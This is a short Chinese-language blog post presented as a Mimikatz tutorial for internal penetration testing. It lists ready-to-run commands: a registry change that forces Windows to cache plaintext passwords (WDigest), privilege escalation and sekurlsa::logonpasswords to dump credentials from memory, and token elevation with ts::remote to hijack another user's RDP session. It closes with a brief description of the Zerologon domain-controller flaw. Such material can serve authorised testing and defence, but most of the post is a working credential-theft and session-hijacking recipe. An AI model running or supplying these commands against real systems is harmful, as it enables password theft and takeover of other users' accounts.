Mimikatz使用教程

介绍

Mimikatz是一款开源的Windows安全工具,它被作者定义为“用来学习C语言和做一些Windows安全性实验的工具”。Mimikatz工具在Windows操作系统中运行时,可以从内存中提取出操作系统的明文密码、哈希、PIN码和Kerberos票据等,并支持哈希传递(pass-the-hash)、票据传递(pass-the-ticket)和构建黄金票据等功能。Mimikatz工具发展到今天,在开源社区的助力下,已经成为在内网渗透测试中必不可少的工具之一。除了本机凭证相关功能之外,Mimikatz甚至还引入了RDP远程桌面服务劫持、Zerologon自动化获取域控权限等强大的功能。
下载地址
注意:当目的为win 10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Mimikatz命令

提升权限命令

privilege::debug

img

抓取明文密码

privilege::debug
sekurlsa::logonpasswords

img

会话劫持

ts::sessions   查看当前目标主机存活的会话列表
privilege::debug
token::elevate
ts::remote /id:1    将远程桌面切换到会话ID为1的用户身份中

补充点:Zerologon漏洞(CVE-2020-1472),通过该漏洞,只需要访问域控服务器的445端口,就可以在不需要任何有效凭证的情况下获取域管理员的权限。Zerologon漏洞的成因是Netlogon协议认证的加密模块存在设计缺陷,导致可以在不具备有效凭证的情况下通过认证。

posted @ 2024-03-17 18:59  kalixcn  阅读(760)  评论(0编辑  收藏  举报